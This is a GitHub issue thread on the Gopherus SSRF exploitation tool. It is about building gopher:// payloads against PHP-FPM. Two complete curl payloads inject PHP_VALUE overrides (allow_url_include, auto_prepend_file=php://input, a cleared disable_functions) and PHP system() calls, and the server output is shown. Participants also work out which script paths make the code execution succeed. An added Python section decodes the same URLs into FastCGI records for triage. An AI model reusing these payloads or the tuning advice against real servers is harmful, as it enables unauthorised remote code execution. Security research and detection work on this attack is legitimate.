tarunkant / Gopherus

This tool generates gopher links for exploiting SSRF and gaining RCE in various servers
MIT License

fastcgi: Clear security.limit_extensions value #6

Closed mpchadwick closed 5 years ago

mpchadwick commented 5 years ago

There's a good chance of finding phar files in standard locations according to their installation guides.

E.g.

Currently I get the error below when trying to use it with /usr/local/bin/composer

curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/local/bin/composer%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
_Access to the script '/usr/local/bin/composer' has been denied (see security.limit_extensions)
jStatus: 403 Forbidden
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

Access denied.
5 G%

tarunkant commented 5 years ago

Hey, if we want to look at a file which doesn't have permissions, then why don't we first get RCE through the default file location and then try to read the file you want or find the files you want.

mpchadwick commented 5 years ago

@tarunkant what I'm suggesting is that the payload be updated to clear the security.limit_extensions directive.

I believe doing this would remove the requirement to know the location of a .php file on the system.

I've been trying to understand how to edit FastCGI.py to send that directive, but can't figure out how to do it and ensure the FastCGI packets are still valid.

If it helps, I mean something like this:

https://github.com/tarunkant/Gopherus/commit/908d138d149a129f04d239e7d638a5d918124208

mpchadwick commented 5 years ago

Hmm, I figured out the FCGI_PARAMS format; however, it turns out I was mistaken. PHP-FPM will not allow you to set the directive this way...

curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0C%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH63%0E%04REQUEST_METHODPOST%09hPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asecurity.limit_extensions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%02SCRIPT_FILENAMEls%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3F%04%00%3C%3Fphp%20system%28%27/etc/passwd%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
hPassing INI directive through FastCGI: unable to set 'security.limit_extensions'
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

File not found.
no-%

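The two payloads in this thread are easier to reason about once they are decoded back into FastCGI records. The Python helper below is added here as an illustration; it is not part of Gopherus or of this thread. It parses a captured gopher:// URL into FCGI records, extracts the FCGI_PARAMS (SCRIPT_FILENAME and the PHP_VALUE INI overrides) and the STDIN body, and reports whether the target script would pass an extension check, so an analyst triaging an SSRF alert can see what the request asks FPM to do without replaying it. The function names and the ASSUMED_LIMIT_EXTENSIONS list are assumptions of this example; the two embedded URLs are the ones posted above.

```python
"""Decode a captured gopher:// SSRF URL into the FastCGI records PHP-FPM would receive.

Added triage helper, not part of Gopherus or this thread: it lets an analyst read the
FCGI_PARAMS (SCRIPT_FILENAME, PHP_VALUE overrides) and the STDIN body of a captured
payload without replaying it against a PHP-FPM socket.
"""
import struct
from urllib.parse import unquote_to_bytes, urlsplit

# Record types from the FastCGI specification.
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5

# Assumption for this example: the pool only allows ".php". The real list is whatever
# the pool's security.limit_extensions setting says.
ASSUMED_LIMIT_EXTENSIONS = (".php",)

# The two URLs posted in this thread (the thread's own data, not constructed here).
URL_COMPOSER = "gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/local/bin/composer%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00"
URL_CLEAR = "gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0C%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH63%0E%04REQUEST_METHODPOST%09hPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asecurity.limit_extensions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%02SCRIPT_FILENAMEls%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3F%04%00%3C%3Fphp%20system%28%27/etc/passwd%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00"


def gopher_selector_bytes(url: str) -> bytes:
    """Bytes a gopher client sends: the path minus the leading '/' and the
    one-character item type (Gopherus uses '_' as a dummy type)."""
    return unquote_to_bytes(urlsplit(url).path[2:])


def parse_fcgi_records(data: bytes):
    """Split a byte stream into (type, request_id, content) tuples.
    Header layout: version(1) type(1) requestId(2) contentLength(2) padding(1) reserved(1)."""
    records, pos = [], 0
    while pos + 8 <= len(data):
        version, rtype, req_id, clen, plen = struct.unpack("!BBHHBx", data[pos:pos + 8])
        if version != 1:
            raise ValueError(f"unexpected FastCGI version {version} at offset {pos}")
        content = data[pos + 8:pos + 8 + clen]
        if len(content) != clen:
            raise ValueError(f"truncated record at offset {pos}")
        records.append((rtype, req_id, content))
        pos += 8 + clen + plen  # skip the padding bytes too
    return records


def _read_length(buf: bytes, pos: int):
    """A name/value length is 1 byte, or 4 bytes big-endian when the high bit is set."""
    if buf[pos] & 0x80:
        return struct.unpack("!I", buf[pos:pos + 4])[0] & 0x7FFFFFFF, pos + 4
    return buf[pos], pos + 1


def parse_params(content: bytes) -> dict:
    """Decode FCGI_PARAMS name-value pairs (nameLen, valueLen, name, value)."""
    params, pos = {}, 0
    while pos < len(content):
        nlen, pos = _read_length(content, pos)
        vlen, pos = _read_length(content, pos)
        name = content[pos:pos + nlen].decode("latin-1")
        pos += nlen
        value = content[pos:pos + vlen].decode("latin-1")
        pos += vlen
        params[name] = value
    return params


def ini_overrides(php_value: str) -> dict:
    """Split a PHP_VALUE string ('key = value' per line) into a dict; '' means 'clear it'."""
    result = {}
    for line in php_value.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            result[key.strip()] = value.strip()
    return result


def passes_limit_extensions(script_filename: str, allowed=ASSUMED_LIMIT_EXTENSIONS) -> bool:
    """Mirror the check FPM applies to the main script's extension."""
    return script_filename.lower().endswith(tuple(allowed))


def summarize(url: str) -> dict:
    """Decode one captured URL into the facts an analyst wants to see."""
    params, stdin = {}, b""
    for rtype, _, content in parse_fcgi_records(gopher_selector_bytes(url)):
        if rtype == FCGI_PARAMS and content:  # empty PARAMS record just ends the list
            params.update(parse_params(content))
        elif rtype == FCGI_STDIN:
            stdin += content
    overrides = ini_overrides(params.get("PHP_VALUE", ""))
    script = params.get("SCRIPT_FILENAME", "")
    return {
        "script_filename": script,
        "script_allowed_by_limit_extensions": passes_limit_extensions(script),
        "ini_overrides": overrides,
        "tries_to_clear_limit_extensions": "security.limit_extensions" in overrides,
        "stdin": stdin.decode("latin-1"),
    }


if __name__ == "__main__":
    for url in (URL_COMPOSER, URL_CLEAR):
        for key, value in summarize(url).items():
            print(f"{key}: {value!r}")
        print()
```

Run against the two URLs, the summary lines up with the responses quoted in the thread: the first payload names /usr/local/bin/composer, which fails the extension check (the 403 "see security.limit_extensions"), and the second names "ls" and carries an empty security.limit_extensions override in PHP_VALUE, which FPM refused with "unable to set". The same decoder is a reasonable first step when a proxy or egress log shows a gopher:// URL aimed at port 9000.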
tarunkant commented 5 years ago

Hey, your payload is incorrect because in the place of FILE_NAME you wrote ls and in the place of COMMAND you wrote /etc/passwd. And are we able to disable security.limit_extensions (I think no)?

tarunkant commented 5 years ago

Btw, you can put the file name /etc/passwd, but it's preferable to use a file with a .php extension (btw, I did put one default file, which will always be there if PHP is installed).

mpchadwick commented 5 years ago

@tarunkant thanks for all the follow-up here. Just to note, it's not true that /usr/share/php/PEAR.php will always be present (which is why I was seeing if it's possible to use a file that isn't .php by modifying the security.limit_extensions directive).

[vagrant@localhost magento-1-14-4-0-ee]$ stat /usr/share/php/PEAR.php
stat: cannot stat ‘/usr/share/php/PEAR.php’: No such file or directory
[vagrant@localhost magento-1-14-4-0-ee]$ which php
/usr/bin/php

Unfortunately, as far as I can tell PHP-FPM does not allow changing security.limit_extensions this way.

mpchadwick commented 5 years ago

Turns out the file is present on my system, just in a slightly different location.

/usr/share/pear/PEAR.php

tarunkant commented 5 years ago

Cool, you can also check with /etc/passwd, it will work.

mpchadwick commented 5 years ago

You're right. It does work for me.